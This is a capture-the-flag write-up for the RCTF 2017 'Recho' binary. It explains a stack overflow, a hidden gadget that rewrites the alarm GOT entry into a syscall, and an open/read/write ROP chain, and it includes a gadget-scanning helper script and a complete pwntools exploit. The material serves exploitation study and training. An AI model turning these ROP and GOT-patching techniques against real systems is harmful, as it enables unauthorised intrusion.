[BMZCTF-pwn] 18-RCTF-2017-Recho
2022-07-03 04:30:00 【Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi】
Reproduce it? No, I couldn't.
The code is simple, and the overflow is obvious:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    char nptr[16]; // [rsp+0h] [rbp-40h] BYREF
    char buf[40];  // [rsp+10h] [rbp-30h] BYREF
    int v6;        // [rsp+38h] [rbp-8h]
    int v7;        // [rsp+3Ch] [rbp-4h]

    Init(argc, argv, envp);
    write(1, "Welcome to Recho server!\n", 0x19uLL);
    while ( read(0, nptr, 0x10uLL) > 0 )
    {
        v7 = atoi(nptr);          // read in the length
        if ( v7 <= 15 )
            v7 = 16;
        v6 = read(0, buf, v7);    // read that many bytes into a 40-byte buffer: stack overflow
        buf[v6] = 0;
        printf("%s", buf);
    }
    return 0;
}

The problem is that there is no exit from the loop: it only ends when read(0, nptr, 0x10) stops returning a positive count. That happens once we close our side of the connection with p.shutdown(), so read returns 0 (EOF), the loop ends and main returns into whatever we left on the stack. By then we can no longer send anything, so the whole ROP chain has to be placed in advance, in the single read(0, buf, v7) that overflows buf.
Another issue: for an open/read/write (orw) chain there is no open function in the binary, so we need to turn a GOT entry that is no longer needed into a syscall ; ret. alarm in libc 2.23 is very short, just two instructions: mov eax, 0x25 ; syscall. The mov is 5 bytes long, so the syscall sits at alarm+5; if we add 5 to got[alarm], then alarm@plt jumps straight to the syscall instruction, and the wrapper returns normally afterwards, so execution continues with the next gadget in the chain.

At 0x40070d there is a piece of "hidden" code. It is hidden only in the sense that a jmp precedes it: the bytes after the jmp are never executed on the normal path, so IDA does not display them. The three bytes there are 00 07 c3, which disassemble to add byte ptr [rdi], al ; ret. With rdi = got[alarm] and al = 5, that gadget adds 5 to the GOT entry and turns alarm@plt into a syscall.
Then we need the file name string. Typing it in ourselves would be a little troublesome, but the challenge binary already contains the string "flag", so we can reference it directly.
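To make the two tricks above concrete (the gadget that IDA does not show, and the got[alarm] + 5 bump), here is an added helper script that is not part of the original writeup or the challenge. It scans a byte blob for add byte ptr [reg], reg8 ; ret gadgets by decoding the ModRM byte after opcode 0x00, locates the syscall instruction inside a function body to compute the GOT delta, and checks the one caveat of a single-byte add: the bump must not carry out of the low byte of the address. The sample .text bytes, the base address 0x400700, the libc address 0x7ffff7ad9200 and the error-check tail of alarm() after its first two instructions are all constructed assumptions for the example.

```python
"""Gadget-hunting helpers for the got[alarm] -> syscall trick (added example)."""

REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]

# Constructed sample .text: a short jmp skips three bytes that a control-flow
# following disassembler never shows, the same situation the writeup describes
# at 0x40070d. The base address is an assumption for this sample only.
SAMPLE_BASE = 0x400700
SAMPLE_TEXT = bytes.fromhex(
    "4889e5"      # mov rbp, rsp                   (filler)
    "eb03"        # jmp +3                         (skips the next three bytes)
    "0007c3"      # add byte ptr [rdi], al ; ret   (the hidden gadget)
    "4883ec10"    # sub rsp, 0x10                  (filler)
    "c3"          # ret
)

# alarm() from glibc 2.23: the first two instructions are the ones quoted in
# the writeup; the error-check tail after them is an assumption for the example.
ALARM_BYTES = bytes.fromhex(
    "b825000000"    # mov eax, 0x25   (5 bytes, so syscall is at offset +5)
    "0f05"          # syscall
    "483d01f0ffff"  # cmp rax, -4095
    "7301"          # jae <error path>
    "c3"            # ret
)


def find_add_mem8_reg8_ret(text, base):
    """Return [(address, disassembly)] for every 'add byte ptr [reg64], reg8 ; ret'.

    Opcode 0x00 is ADD r/m8, r8. With ModRM mod == 00 the r/m field names a
    bare 64-bit base register (except rm == 100, which needs a SIB byte, and
    rm == 101, which is RIP-relative), reg names the 8-bit source register,
    and a following 0xc3 is ret. No prefixes are handled, which is enough to
    find the 00 07 c3 pattern used in the writeup.
    """
    found = []
    for i in range(len(text) - 2):
        if text[i] != 0x00 or text[i + 2] != 0xC3:
            continue
        modrm = text[i + 1]
        mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
        if mod != 0 or rm in (4, 5):
            continue
        found.append((base + i, f"add byte ptr [{REG64[rm]}], {REG8[reg]} ; ret"))
    return found


def syscall_offset(func_bytes):
    """Offset of the first 'syscall' (0f 05) instruction inside a function body."""
    off = func_bytes.find(b"\x0f\x05")
    if off < 0:
        raise ValueError("no syscall instruction found")
    return off


def got_bump_for_syscall(got_value, func_bytes):
    """(delta, new_value): what to add to a GOT entry so it points at the syscall.

    The writeup's gadget is a single-byte add ('add byte ptr [rdi], al'), so
    the bump only works if it does not carry out of the low byte of the
    address. ASLR leaves the low 12 bits of a libc address unchanged, so this
    check can be done offline on the unrelocated libc symbol address as well.
    """
    delta = syscall_offset(func_bytes)
    if (got_value & 0xFF) + delta > 0xFF:
        raise ValueError("single-byte add would carry out of the low byte")
    return delta, got_value + delta


if __name__ == "__main__":
    for addr, insn in find_add_mem8_reg8_ret(SAMPLE_TEXT, SAMPLE_BASE):
        print(f"{addr:#x}: {insn}")
    delta, patched = got_bump_for_syscall(0x7FFFF7AD9200, ALARM_BYTES)
    print(f"add al={delta} to got[alarm] -> {patched:#x} (now a syscall)")
```

The same scan run over the whole .text of the real binary is how you confirm that a gadget a disassembler does not list is really there; the carry check is what you would run before relying on a one-byte add against a different libc, where alarm may not start on a 0x00 low byte.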
Complete exp:

from pwn import *

local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('106.75.101.133', 10024)
libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]   # one_gadget offsets, not needed for this chain
libc_start_main_ret = 0x20830
elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug')

pop_rax = 0x00000000004006fc  # pop rax ; ret
pop_rdi = 0x00000000004008a3  # pop rdi ; ret
pop_rdx = 0x00000000004006fe  # pop rdx ; ret
pop_rsi = 0x00000000004008a1  # pop rsi ; pop r15 ; ret  (needs a dummy value for r15)
'''
#got.alarm -> syscall
.text:00000000000CC200 ; __unwind {
.text:00000000000CC200 mov eax, 25h ; '%'
.text:00000000000CC205 syscall ; LINUX - sys_alarm
'''
add_rdi_al = 0x000000000040070d  # add byte ptr [rdi], al ; ret  # b'\x00\x07\xc3'

# padding: buf sits at rbp-0x30, plus 8 bytes for the saved rbp
payload = b'A'*(0x30+8)
# got.alarm -> syscall: rdi = got[alarm], al = 5, then add [rdi], al
payload += flat(pop_rdi, elf.got['alarm'], pop_rax, 5, add_rdi_al)
# open('flag', 0): rax = 2 (SYS_open); alarm@plt now lands on the syscall instruction
payload += flat(pop_rdi, next(elf.search(b'flag')), pop_rsi,0,0, pop_rdx,0, pop_rax,2, elf.plt['alarm'])
# read(3, bss()+0x100, 0x40): the new file descriptor is 3, since 0/1/2 are already open
payload += flat(pop_rdi,3, pop_rsi, elf.bss()+0x100,0, pop_rdx,0x40, elf.plt['read'])
# write(1, bss()+0x100, 0x40): print the flag
payload += flat(pop_rdi,1, pop_rsi, elf.bss()+0x100,0, pop_rdx,0x40, elf.plt['write'])

# first read(0, nptr, 0x10) takes the length, the second read(0, buf, v7) takes the chain
p.sendlineafter(b"Welcome to Recho server!\n", str(len(payload)).encode())
p.send(payload)
# close our sending side: the next read(0, nptr, 0x10) returns 0 (EOF), the loop
# ends and main returns into the chain
p.shutdown()
p.interactive()